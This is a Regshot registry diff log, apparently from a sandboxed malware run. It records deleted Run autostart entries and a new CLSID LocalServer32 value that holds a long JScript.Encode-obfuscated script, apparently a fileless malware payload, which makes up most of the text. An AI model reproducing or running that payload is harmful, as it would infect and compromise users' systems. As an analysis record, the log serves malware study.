Regshot 1.9.0 x86 ANSI
Comments: 
Datetime: 2016/1/2 17:15:50  ,  2016/1/2 17:16:24
Computer: KWAPA-2FD109606 , KWAPA-2FD109606
Username: Kwapa , Kwapa

----------------------------------
Keys deleted: 6
----------------------------------
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Run

----------------------------------
Keys added: 4
----------------------------------
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_RASMAN\0000\Control
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_TAPISRV\0000\Control
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RASMAN\0000\Control
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TAPISRV\0000\Control

----------------------------------
Values deleted: 12
----------------------------------
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VBoxTray: "C:\WINDOWS\system32\VBoxTray.exe"
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Adobe Reader Speed Launcher: ""C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe""
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Adobe ARM: ""C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe""
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\: ""
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL\: ""
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL\Installed: "1"
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI\: ""
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI\Installed: "1"
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI\NoChange: "1"
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS\: ""
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS\Installed: "1"
HKU\S-1-5-21-789336058-746137067-1708537768-1003\Software\Microsoft\Windows\CurrentVersion\Run\CTFMON.EXE: "C:\WINDOWS\system32\ctfmon.exe"

----------------------------------
Values added: 10
----------------------------------
HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\a: "#@~^k4QAAA==n{F+2i@#@&l{xAPzmOk7+p6(L+1O`r?1.rwDRUtnVsE*i@#@&S4k^+cne'c+b@#@&`@#@&7DDz@#@&i	@#@&diWE	mOkKx~^9x`*@#@&id	@#@&7diYMX@#@&77i	@#@&i7diDnO!Dx~CcIno"nmNcrCnSH'-kG0DhCD-whbmDKdW6Y-'UnY,0Mlh+AGM3~/OEa-wU9w-w-yRTRlTF {'-kwJ*i@#@&didN@#@&d771lY14`#@#@&77dP@#@&d7d7.Y;D	~!p@#@&7id8@#@&idN@#@&7i0;	mDkW	P9cE*@#@&di	@#@&iddXxxhPz^Ok7+or8Ln^D`EHka:^  jD\n.oHJC:PhRc!r#i@#@&i7dXRGwxcEV2KrSEB0l^dn#p@#@&d7da k+UNvbi@#@&77iE0UxmR36aC	N3	\bDW	:UYUY.k	odcr]Yhwu--rbQEc/!4dY.r	ocEcslkY(U9+66WvJ&J*Q8#I@#@&idd!0	O'!0U_rROhaJi@#@&didE6Ox0cZM+CYnP6Osbs+vEWUD~Y.;~RF*I@#@&7idb0`!0Db@#@&d7dP@#@&7idd!WYcDbOn`XRM+dwGUk+$W9z#p@#@&7idd;WDR/VKd`bp@#@&ddid!W'6R/DlOn:+6Dok^+`!WU~DD!+bi@#@&id7d!WY{0 !Ysrs`;0	O*i@#@&didd!0kxE6Y ra+U)kK+XO?DD+mhc#p@#@&d7d7;6/ ICNv bI@#@&d77iEWRq.bYnvE6/R"+m[`!0ORUk"n  #*I@#@&ddi7;0kR;VG/nc*i@#@&i7diEW ;VWdnv#I@#@&7id76RG+VYok^+cE6xObp@#@&i7dilR";U`r-rJQEWU3JwJ,&;!knO,zxG./
OlMOr~TBF*i@#@&di7d6R9+^+OnwkVcE6x#p@#@&did)@#@&d7N@#@&7dSxlc2a2mxN3U7k.W	hxOUYMkxT/vE]SkUNbDYE*i@#@&7d6'xA~b1Yb\n(68N+^YvE?1Dr2DkxL wks+UzkYnsr(L+1Yrbi@#@&7dbv*x6RsKsND2XrdYk`S_E-wdH/AWScr#I@#@&dd2xS_E-'E3`r+cQJ/H/SGh+cE)r/zdD+:2+J*_J'wAk	NKhdwGADdtsV'--qc!-w2KhnDk4Vsc+X+Jp@#@&7dStrV`ZWcsk^n2Xk/Ddcw*#@#@&7d`@#@&d7dS-'6R!nDsksnj+./bG	`A3J'-xKY2l9Rn6Jb kwVbO`rRJ*I@#@&idiE['EEp@#@&di7Ea'EEp@#@&77i/AkD^4`A7$ZT#@#@&i7dP@#@&did^Ck+PrXJ=@#@&i77db0vkcb@#@&d7di`@#@&d77idE[xrtOYalJz[Kh	VWmNchk1DG/K0O 1W:J[WSxVKC[zOzRzz10+FTcZO1 8{ c*C* 4[m2RON8848m*6G+zg+OsX TjhF{Xcc+6EI@#@&did7d;2{J4YD2)Jz[GSxVGC9Rhk1.K/G6YcmWsz9Gh	VGl9z$&Gz,J$fOAA8ooO+vZ,Rc$qZO1&2*O+fT/l%!zb{zqr	NGS/U+D7+M+!Z&R|~,0O&! avWO2g! +X+ri@#@&77idN@#@&7didnsk+@#@&7id7	@#@&id7id!N'rtDOw=z&NKhUsKlNchk1DWkGWYcmK:&NGA	VGl9&!J%&^J!%^qO0Cc *1cW c604 ,9m FX!O!XF%mOnzg+Ywa+!Un8{a% 6nJp@#@&id77iEwxE4YOw=&JNGSx^Wl9RsrmMWdW6Y ^K:z9Gh	VWm[&2JZJ2&2/3O,X%2R Z!fRW**9R~v0F Rf$+FZAcWbW&bx[WS/pK |AO%O&! a0v 2gM +anri@#@&i7di
8@#@&idd78M+C3p@#@&@#@&idimlk+,Evr)@#@&id77khkD^tvh\]qD#@#@&id7d`@#@&d7di7mm/n~r!Jl@#@&d7di7b0cbvW#@#@&di7di	@#@&id77idEaxJ4YYal&z9WSxsWC[c:rmMG/K0O 1W:&[KhUVKC9zfJZJ%z2ZR/slF3O8f19 cfz)Ozb2zRXZW%GF/fTXlZ&bUNKhdc!OF$Ov0,2T 6WRs/Eri@#@&did7d)@#@&7iddinVk+@#@&77didP@#@&d77id7EaxJ4YO2=zz[GSxsWm[c:r1DK/W6Yc^Wsz[WSxsGmNzz&GJ*zz{XA;!8GRvf/AO*GGORs)* bs$X; qAz/lc&qk	NWS/+ ! |$,+%1fZO6RRs/ErI@#@&idid78@#@&id7di8DlVI@#@&d77i8@#@&i7id8M+m3i@#@&i7d)@#@&didrWvmN	c#{'!*@#@&didP@#@&d77iNcE9bi@#@&77i8@#@&7id[`!2*i@#@&di8@#@&diclc2U\bDGUs+xDcJhDW1nd/r#*`ElEb{Jr+X~`]KnaDR2U^KNrxTD=))UZ&qRV+DjYMkUov$/G	\+MOT=)sMGhAm/v*?O.bxL`E[Cx*9}aGf}Gx}U.!e2I2( Wo}ypg/o^G9pK9/#~tmsoY&Zt(i!sH5qFsN!#H|oA7^ ^!C	OEnP)kK	s!tVsT(&x*nUI`^xjVF.Zo	q"*mV#4o.!TBoA4mssO}p]^mUHk	F~t^hwY}p]^mrt582129M^\4N!XF.Zo	F"*^!jNq;]?\(I8^h*`+oAsn#Oq4+V0p?0G9}K9Zj]`+pA^}	.2(M"VmNF(}(~h]MOYe	^E(:Gv5&.H^h.!NAI-4	oa4r*At\w8hj2+	X44	VN}o1"\8k4_3KF2lV[X8nehaV52}o`&V.[!.DS^9s}ha^5fIa8 WE}pgy}	qb4uV}eqFsnZx?}q}ktg!t"2t	XV}yo!\?qaFj6(j2V"N
!#DSs9^t:XVef"w4+*!I	Fa[;*$1&gV4q9knjxFCX3tpxA5yHV1&196%wUNqc2SV]^}hV!tj"*8hwYl	Hg4+I88VjG&3^EKq.D8&x*PO3[	XVqbA3\:sk^+jaS0Is}hs!}#Il^M`W(U5kS/BG4!s.^H6}9x/lqHki jt8Mj3J3wEmysf(Ms.^z6~NoI-p+a4mfHbJsDKnpg!}	T!Kp.k[VV%I(g!IV.kt9t[MjNFPk1ZTV9xsIl^!.;NqVd}!#HSVI^t:^Etig\4UHZmU.N[V,znZx?.w1StgweXre	8VSA4w\M.;n#1a}H6}N	Bkl	HbJsDKnpg!}	T!jh.s8V.%9M^\4b*GeX/Clx}+OENs#E9MV78U19rNwPN!o!}!sHtZS3i!wX5	q^N!.H^H3;` j!?qFS8MjYtl!ep"w4yXM(Ms	^zobj	.;N!sD}j6geltt+j3qrVFf}Wx/UIi(~Vp	.a8M"V^kl2t	\w4s#1\(IK8+pKq0V;Nh1M}jqk(V~FehXw5za&l	I^}	VPm1/Ks.2i X\[ZXCpx!Nqo/&kh0ih.ZNo9;.usS}jh0iMwXe	8VN!#Hmz3!iy.TU8h4V.Dtl!e("w8+lM4Vox1XobiU.!NVVO}jag5	*4t j3(r0Gf}GxZp9^[_.z(kz3._VStjxFCX3tp&Ep2BVI(I^#uVS}Uo2rATnZp!g/o^:[	lLN!s74rA	e5!F;(k1ZT3xiMwXeZoFoDp5oBt(.ZtpqKjV,"lp]a4+cO\ZX1e	l35p]7mU3OBwIz9`w(UA(i&"XClxpjz3Kq1396^JoY55o944	#Z}pqKiMOyCp"w4+*OHj6geq*VI("\m	3OBs"X[`wpj~4j2]Xm*	pjb0j_9-5+#0Np9^FKk1/L099oHlmfI^8`s"1 jY5s6lK.DA^C~28+8tlqXN}LwG[p9H}q*TI!1D5	V!J39V[3wym+#D5h6atoHGn(X(lV.Ht?8ne
:aVef"G9w0E" 67ehskpo1"}	qb4uVGegWtjzYp	X0q/I6J06-I w!lq,!JVgh8M^!F/xmqbs4dKs9JV.XNqsdmzLbjfV.[MjYJh"/4/(a0P/g/T3BxsjEmysstjlt[M^ ti8VNV4\\CHOBo1lm2Is4io.m+.De:X*JV9VNo]lm!jK(0F2I&x\my,s[Zl(CWy\rl.4	Ht\:.}epIaNs.H}p]K4+I.(k0G9}K9ZpB^Nu.H8bbVjly5q}^P:w!C(\VP	j!lV131X*_tpIg}oIG4+}KqVN^[s~X8+gA}!]H}p1.(b3;Ul 4yY^FZ"E[X/J3zW8H*1&I^8j*UNq*Tl	q^SVV![MjX8f~K}pByl	1^^H*(Il34V.Ut\NF2lV[z8n5s2VI&pTifV.NV.OSsB84UIa8`Ej	l!}pB7mo1^^	}2I jyS0t48:"/t.xVtrTWKs#&dj,bCh.NN;AB4U]5NuqaJZ".8Ugt}h#}5pIa[s.H\("W4yI.J39V[28V[!4\};Lk" .ZP	,0Nq6s?!o!}!6^(k0Ej	l 4+O^|/I![q6dd2zW9AF7tCj/t?0wFj0/9w$X( 1^tu.H}U32rATnZp!g/o^4}U^!}#O9(jb0^GF85 OENs.H[sZv63\X8+8Z5oHVgLI:[u9a4smGqst\NU1	F&4\e	8!	oD.hFa#jNtj!9h+jw782\Y8M46eh8t?^BlsV48#}Dlj.p}#[_mu1m8 XM8T\WmiTH5iwUe`wtIa|4qVj# D(] OF	hO/I	$/mCsm]+snjssG	oD+!Fa#.96#T9t?sB4+!Fa#jNqq3DsNZs~}jwc\s4A#h8/+q]1\2}Wjo}K50.(?oBNlu1b]y^;n!D5KioxN3sA]0,39!wc.2oS	swj]y^W	V83INosCA\8V6&jsIGl!H!439WCF4L}i83IUHw}!60]0I(`:x?+qqHP3xc\s1!	V9?+j2(I3tUeUt+5.tCIUt	pT6l]:jH}q9tI
!#:NqV0i8N\IF"fK^}mt&K\n(\*Csx?|ys/`.}D]3wj}^w5HU[ZrPs;C j2Jf9c+Pt7j/,Ajw2q:y4WHow7[s\fj("fi3^!I`#qmjImthN~p:tJK!#GpT6N}x^H#TgKKoo;}TpWt8A45?O6?sI^Cja5t(^|ihjKI	[An!.	tTs~p`,"K!VXI#3y6M8H	!j*K!]^li6UtsV\"2^Lj_I2i3"wnVgCt"x5rAoA`2Ya#PHSl^.eji37?pAUtVgHih\*Ko4sjipHjoAo5:"A1^9;\Fw3iW\ih\*IVt:9!*N[#NA}s}fKh]"KTw0tjg|#!\KKs]bppw2}y66}j^!KNVx^MgZe3w2ni"h5Z]k5Ls;CT1A|Z2X+PeZj9IA\Fj2C#45Nz0S9Ia\woT:y~5ly17#!l?e!xI#pI*.N499fsGjp.^j`9opiox?3N;}3jA}i9hp	o~ppN~}`s3t&I*+^._8!A\6jg|ih\wI	[An!.VtT.~p`VTKotxKhhl}jgHFq~nlT}2}36Vj:s#"FgA+	Vo	K9K[FavPP"!?ZH91&Vh69jHpq,+K+4N49AV	(5*}T^!+i]x?3t;}0.$5jwpHy3.8!jAJ av^3ADH8H&Ik,Uts1ANyVU1#]sjUV+	("&i3wpN+VZ1Vs~}`s$\yg&p0I~}L~K	KAc}#w*KA]&`2Vjt%Vq1AVdI%#x3s0}&jH	u9IIo4slU9&8213mMgZ1`9"Fyg&P&gqCPzy1V2.`jV~83p7}V.iSqtspTw~Hs~2}V^11To&!Ia\woT\y4L.qN+62w3exjHCUwIp`oA5!w`ti1tl	s$pio~pThH}&"VPVwp?	^H9A~P2HzmKw5}Z,q	f~LnV9r#U\;jNtE`V$	!Yxlj}eNT}25qtm8F4Kt3w*p%]yroA~}`s3t2w1j0sU^j"c[!S\#!\ZH:#A"L2l}#Ahl:1oI	4s%s2HC"9i3^!KiHGlus~]y,/dyg.?`2WCkRht(gfPP4Z}^4/93w2C
3s~.^V+m+^M+!,48("}e	84	sj.qVo]2AXq:O/IsFkCCwk8w|isacqoYj:Fa##N^.ZNAmq2743}7]:46PPxt?sB4?sV4C0wOm.j(l8N_8&jl8 XM^!XWmj2CIjwUe	t\5qF*4	sj.fso] w|ihwc4	sj.f.mjZ.f5jwApooS	2w8X*t383I	4qj:tb]it&js1Gm+B_r	wWCF41}i^!pi]VKTI2}otpf~5jjI_64lP"M\ijcmwsE:2tUt!tK5y*dpU4M!1~P"M^Tj34!]VI3tUe^9XILxrp	oS#y"l]Fx*	s9k?wBkCwN6owVNsN9KusV}i6G# w2t#g&	]:.T6N#A16jVax+b,l[x^;iV&DC	XI.sq2UV.s	hWHN2pXHiBM}ip7[&4*HhOpST]&jP.h6Voa:O!.01x[2gpj("s]i4wIw2:\!s~63Yt}`19K!H;+i6o}FgHiixxI94	j!s~J2sF\Mjw?^t^nja?t.gM[TADIq[x5js~Pf1tl:soPeW4i6It(^Ht!jwKoBsli6Ajq1}9C9?IVV+i!9x\VTc}iwp?ys.tyA$##t"pU,BmoBsjT6Utx^H	!\II9Bxm3.;tA2+`3&yjqI"8kO?tx^2th\&KsHFj!IstUN}}wsK?h]^pTw`tVgr#!xA+U[G43cljoI6}j^h5Z9b}j"*]C~L]!xZH`BD5!pM}PVl1NI}13}..iIa	s4&J"~51!VS9Ih\wt.I O(K^9N}Vw.[L^63^!H`H99."}V.~p`V(ITB;Iis~]&~AeiwANTo~pip.[NVjj9\pU%l}!a?t:^M[TADI`tI"js~jpIt.0V649s~pThMi2OD]993K3txH#._iZs.9}1812	xa1HC"S}T^y+`0cgK9~8f}hlV1dH3t\N9VGj("*]3^q?3B;Iis~}jb"mKg\I`27Cxah}?kyif9kS8B:`!I2C	m8.V}j+p2\NuN5}.~&CP5 pio~pis	\2N/"2wZH
w1\\gAi(^H}f9p?j#:}.5Zj	6V1`Vep	]GNi6^[Fw2th\;mV47mTtKeZqq5VADH2Nh^!4w\ft!CsjI?`o/"Z,0t#p7.s}9?V(Zj3t;jjZ\}i45}!VS9I	6AF#\&aypqIb[jX;^.wA}iwf?^]V5!6$^is~p`s9K/OGN/Y}}.~9t"x5H3ohm"9a\jtU:F\5HV1+#!l[:a?HhlIlq2m!Va#st2IGN%.o27o10}(^ZHuIcj3o~pipS}`Fj5."6I_N2PZOjt3&6HiwMH:sA`2,a\T.wlV}CHp^7rPsGj("9i3^!KiHGlus~#0s3.z\jN}2j(a&]L^V#"4EpZ#A5V}$#fNMl0V(m"4~pis~]3l(#%xhms[_m!6m8y6!m3\Wmq1Deja?	Kj}e	ZF4qs.jFso]fAks,dIhOklusb] w|isa?	o$KhFa#jNpj!9\+jw782\Y]:46P!8t?^Bl1sV48#9Dlj.p5q[Aj!9m8 XM8h8hmq[_5iwUe`9Om.j(ljw782\5PM1\[!9ApoLhj3.`]"VK0FVIsHw+uA\83Xqisjcl!H!43}m^yI!jj4WpsVV\.gc\s`hi%xHw#1\2}hj3wy:A(?oB`+!Ymj2a/	Ug3Iso&KUwa]Ns9f~.j2H6jak^ "Mj39/HVo(U2tUiT9.5jtA4!sVH!YW\s4.iP&*I!H.}35H]8}G\295?w90n2ak83Whn9~5}8s(gwm		t01`FVIVOw.%I4	s"qisgc.	o&?h6m^yI!:j9MlyVV\C^c\s4\#Pg/+^oL\252]ft.5N9}?oBspsI0j2ah	Ug3I%s_1	*a]NHzf~.qqHnMX16M"M#T"9Nj2C3tUthty50N	luLS9t0	swvPpg3IVoG1	Yb]2VBqswj?w9"CCjl	sx&n9~.KqBq\CA^^+IVI`Hql+B_+iVIiV"qihwx}i]AmPAm8y6!1383I	9S]39!8Xk!C/kcp`oCIjwUeUtM48I$pio~I3tUe
3XrtT4hIs2.}3}Z[V,/f~(1wWW\yTc6M"M[h4??s^&"2tUeT6mp2}i}o2.}3}WtFt&CP~AK	^WpiFaJZ1\::8tIV}a[F^3iXDHthafK^]}jwI	3sH|8VTKhH~j3w$iVAFC	XI.h2A?s.A	oWz9&5*H`1s6j\LjjW*eTwc+:]\:LVN}poSjwI+N+]NjT60e.gHiha*KoBAp%I~6Vs\\jgKKw1G}!X.}x^HiixxI;1x`2,~6	sn}s1f+r0Z43*ajXC3^/r	ox43}\]_}3"f"tI0s~}jA [y\Ht!4w?s]tjC928fIqlAVTKhsxN3}+}?ky}V4wK3]t4i65j`V3:O/Ks9x\j\?}.zDjqjmyst(Na\o}2l:s	mT3lpTYU}.\sP+DI.sB&.iW7\w}f\yt6NZp.PMXx\yw&]9g.IVs5tYa#Ps.l^jAH3TWppA`#&^H#o9*?qt~.PA~6Vm+j3AhHVI"	3wxJ 9pefjFI;OA}Ks~H!hlHAVTr	ow}iws# 1&ts9Z+	4qKsI$#j.Bj.z*.^wx[Vww\20cCP"&jq[A5js~jp.wI`V]pio~piIl8 Xei"pj+oKjh5lJy1}Dw?^9o}K9&[XDCCiwAp`o9tj9Aj	6V50VTIhBxmTsgJy42is9w?qtAH#.hCw2T\swl?Vm762DL[392Jf9hHA]9:3}b}s9_K.1	}+HZlU9o]&IX]V^!.iqUpT6;]A.3jV9xIw9oCja5#&^H}TOy+qVyj:,a#%s2l^.f+3o7N9sN}?kDt3"5.i}2P.hJypa5&I*Is1w]!":	2w?efjVIVt55.90}j%7j^NXKo]o+i6Aj1&nPg5?"t24i6U#2V\53^S?^9o}!l?i:4I#PwnK^B`V27\#}M.jbX.%$xNUN$#.4\#i\r.!2j9IjiGV	q3\2S8}0}!a?#FgrisgWjU0yj /7\#t".:IdIU25SqN$#.49#i06IU#VpUs;]0,6`:wWjU%X#:9n62Wcj""!I
	s91&Na\"2Wl^V%piq~pisjif^	V\fpU42p#s~}`9edywl8.56Kw*if^(i3" IVtA:xsd8!t"S.seK#LX1uw2]xj2no4j?U[	jisq	o}"j.\M.w}ktCwI] 9APiwApotx5Vs~}i9oKU%X/0..iVW[F9xCpxLpit~pis~iGt	\jjfH0sx[V^n6K4pC3^Dp`oA5!*Utht".sFGN"otisjJy06}T^/rj1g5T}7jo2"5jx.p`s~]ZOM	sxA[!9fI	[q`:Yq\	I`.:sV/0..iVW[F9xCpxLpit	pis~iGt	j!jfH0sx[x9nJ 5his9XS8tyI!}7jp2.p`9%pio~I/,V#sxA[!9fKsBs+osq[Nt	:!jfH0sx	2ww\sTct3xSI;Of1fsAe+1V4ZVaHTo;}Ts~}jxqHU9(lU$xmP1~]sq-"V^?poI	]CxfJy4CTjfH0oS: Ya^h1~l:tV}s4kNVw2tFwA#s^ m+^MN"Aj\qs\\swWVsKCMxtCCwH["xt?^BVsVm8+6V1yF-ph2ju1jjKwCPT"pSq#x493lPqI!}2"ZI_I	]ZOM#!xZ[!9fIo[An!.	[T.~p`VTIqBx4358jKwMHi\fKsBN+os4}y,o5jwfK^9"Cswc[F9DCpxLp`]A5js~j	60+0VdrP$x493HjS*\i^/rPHx493ZjqhXgVzc.^tw]yxA]C\q]9"&10oI5js$##oZ.`}}S+]"lVt;e.gS[u9AKVo~pi27nw.-`jX}pqtN}.~W}.wZ}iwfKA4K`3sZtT1}js}*j#eX}us_tL06FT8LIU$xmP1~}:I$5jw2S.bZ	2w2Hs4|}iwApqsvjFs"PoV~+_Npl+sH5TsA[!wA}#z\.+^7l9}AHwNa5jwApqs	i:OA]2wA}#z*HU11I!}Sjp2.p`9$pio~pso7ns9}iiX}p	V7pPml[HYom.wAp`sx\jI\]35\t!\v?ABt5!YZ[TsUp`s$p#tD4qW7\FT!J"^nIU[&jV%7n
s9(5:wf?2I2}.gA}jwAJf4.pjoHqjsatTpM+`2.HU[VI/,}[L4P3jfHVoxIPI~}Zs$5j41lH%.#j^c[F9xCpxLp`#&5js~P+w41H%-Sz0..iV7H:^S[u924fe7Hz%7HV6!}jOyK;,W#FwIPs^A8"\K?2]&5:,~jis~p`}V.z1W.q."Ps^AHU1\S"o8mTm7nwN]`jX}pq%yi!D![!5\t!\;SZt}`3sZtTIHpH%*.hOwp"9~j!ODCpxLpj0..i37nwNo`jX}p:}2# ahj(Ay}i^!INsM}.o6!*GIAs9I9[;./,.}jwI}iwfIo2GjiF~PytK}sz\SyV"iDWe!wpC3Xyp0oA"2t;ei1dN_N$Iio~pis$#9ZC	4Zp	4}?%2M#0*	j:XVKwA0i3w!t!t*#3jnH0oMj(92e%I~`6tp#t7Ns376jM[TADI	B	Iis~]0p-\2gI.q3WPy9c}gA}i^ K.tSUM%7JzYt+`VdKi2GpT}li?Ds#owspiog5T}7jo2"5jw.p`s~}!lL}j9S]ijfI:$Eqf.d6ow"l:t(4f2hSz%7HC\}nu9(}+sH5Ts;tZs$5j06?`s\8FwIj."Kt!\/.0dc"XYl]+jHp`}4?sBGj	H76jM[TADIP#"pis~]01\`3gIjj2[j"fijwACPT&4ZXFmk%7Hu}7lVjAj!4glTs~}jwv\%wpSTtI+39ZtZ16`3gI.j._Csj.HF^Ae	9M.Vos`VIZtTI&pss9?f]2pit~}jwAJf4(p#obisKeZs}mj^xp`s~}!Xce gM8T^6HZoA\!s~}i1}jZsu?T#wpTjS8VTFj"4Mj#iZ43.n}8p-":x?poI	}!SD]CI&t3\?48[s:y9~i9tqmZ.9HVoxNUNhJ!OHj!wcpp]	p%Ah8w}-qjjnH0s56K~|}F"q}hwf?2]&5jw~}is~.b%*.sowI"9~j("sjVgKK3Hxj3.wj:s#U3xWj8}D8!w\.aIJ"ws58t6: Ya^h1~S.V6
/0lKT6U}Fw.Cp9Wjj0XIiV4}`1$5jwZm`sV	ZOM	VxA[!9fKAXl`3sZtTH7p`V$pioV}us~if0hjVx;S"ok}us~iG3AU3g;S.sDt!wx}jwAe	92Sy]f`.37noNjj`6tp#LX1	IoHC"sjVwwIu4;.3Ij\jVtLwV|yYxCKgA]MXLjVxZHA36Ix9;#+t7j:Ntp#tyro}5]jtX}i\r.oiH}TsMPV1$g3aj+;%76."8&I!Jf4.rwoHqjsa6!IsV6+pTB~pTp2}Vxj#s\l3T7smyPwb-dXR*48V&jyxA]Va(#hO/I`2f5!w}ei1dN_N3STtjpVsZt!t\Jf1cpioV}!,N]`%z5j9WNZ9te!ww#.wDjqzc.sHs"y9~j#AwIA3a}VoqKzYN]Fty}i\l4"sw."9~iGt	`3jfH0s_t!j?^V^A#UIc.NBs5y9~j#t~}w9/.!o~+3NZt!x(Jf4.roobis	6wsHd&4(Kjst	jw.] ^ICiXLpjtY\FVU^sV~.NmaN+]tisqtL4iijCHVoxj3._]wA$jj\Zm`sk}xwA# K\}#&cpjt:}s}:]iHHp`VdIi2;jTpMif4pC3IcpVo~pUs~j:sHU3g?jss	]:On]AX}i\2?ABt5!YZ[TsAp`s$pj1W.VF"Ps^AJ"gIlTtx43.n}	W-"V^?poI	}!":}Fw}}iADI`#&"js~]V*7}ANPHToV5Vt;ejgS[u9AIio~pi27nw}f`x}pqmWij8tL4\TjfH0oM5VN4]i9_NVN/ut!pV.Z[!x(Jf4p#obis	6ws#jKxWN..t	jw[L4iVjfH0oS":1N^sV~NN13.p]	pzY^}!tX}i^ K9LyjThMPG}BUMx}pq3W[xahP ^sJqz\Sy4L5.AKj"I~p`s9Kusg5T}7j(Ay}iw\pio~pT*ji`wOm(aCI_N"j:8WtVK66#g ?.$I`?,~}isWK^IoNTq`jPN}]sAFPfaM431`phFmC:.5IL&hmZ*A]Kxn#
FjcP!8rNsBK9&wgi"IWKZI]Niq`lfVtC:9&P3"1+3a$IPI}}.I*:F"9N`F`eygn[!wA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$p#]qm3s~}jjA}iwApTo~pi27J.t$5jXxp`s~}jwA}jwA}+9Ap`oA5js~}ish?GN-KTotjiw+i!1!}#jvKVsq}uAbC0FXUjtFIjIw[&j2iODiiwAp`oM53}~}i9gpjsBpioA}"Aq}jwA}iwApio~pi2Z}`s9U(9yp01	}jwCt!wA}i^hl`ox5js~}i1IHVFBpTo;pis~}jw&}iwApio~p#s~}0s$5jwApZs~}j\A}jjA}iwAp`oAjjs~iis~p`s$piohphV~t!wf}iw2Sf$2pis~tZs$5.wAp`.~}jws}jwA}iwAj`oA5.s~}is~p`s$pi#~pis~}jwA}iwApio~pis~P0925(~xpZs~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`op"ss\tTw\p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwAP!k6jj#DjVIjnV.~NZNBpTo;pis~}jwY}iwAp
io	pis~}`s$5jwAp`s~}jwA}jwAH3wAp:]fgj*j]VwV.:sH+##	.is~}j"I		99piB	pis~}yN$5jwAp`s~}jwA}jwA}iwAp`on5js~PTs~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis0C3^FP#"DmT2KN+6~}`9	5j^ myN^[FjAt!wA}i\kSy]I\&Wl[%3Xp`sX?h]slr,Vejw&}iwAj	sj9th6wV}5j^K10s~}jwt}.wZ}iwApq2}qCH7tr%7j0}/IP4Vriq8ijOM[TxAj!4nH9Ig]8}d1s\}N8Vd#.9x]F^ZtTjxI^#x"6;jp}\}H,+SToIj%Nq\.a(#h8;Iis;phN}t^}h9 jIp8.W}!Xq	:1ct+IcS2tI`Mt`Hh}Vp:9-pse7r!NV#9YeTa	45p#AgjNsimf~AH2I}Cj4&PZO}i#9Ipy2.qfA~]V9Xj`N-j#e7SqI~j.4At3gSK!]"}f9;jw.HI4Z06y]:\Z\2A\eTkcI.4d!t&nV95|yWXr#4xj	};#jws#iwENq42I	Y;\:Vr5j^!IbYVH!a&t 9A}#zcHqBSmMVw[%tq}Z%qpqBw?fNGi2wpijOM}U[4.i9+}j./9jwIpZ."}jA ]MO}8#xZAo2`M9aJT}Xpy6rSTs;oVUnjgMJ"gIIu4MH3oM[Zp*g&xsp`Ih]s~A}.x\H3"1p`#s`!sw[TF~p`I!?i]AITVtn2xKt991ooVjoA~iws!\!9xH;,W#:DKnjIh}Tj}ps^\g21N[i6HI^VrIP4wr#9A62jsP	aANT32pP3XjVNej.~W}0qM]f5FeV`![Va.rA425jIt]
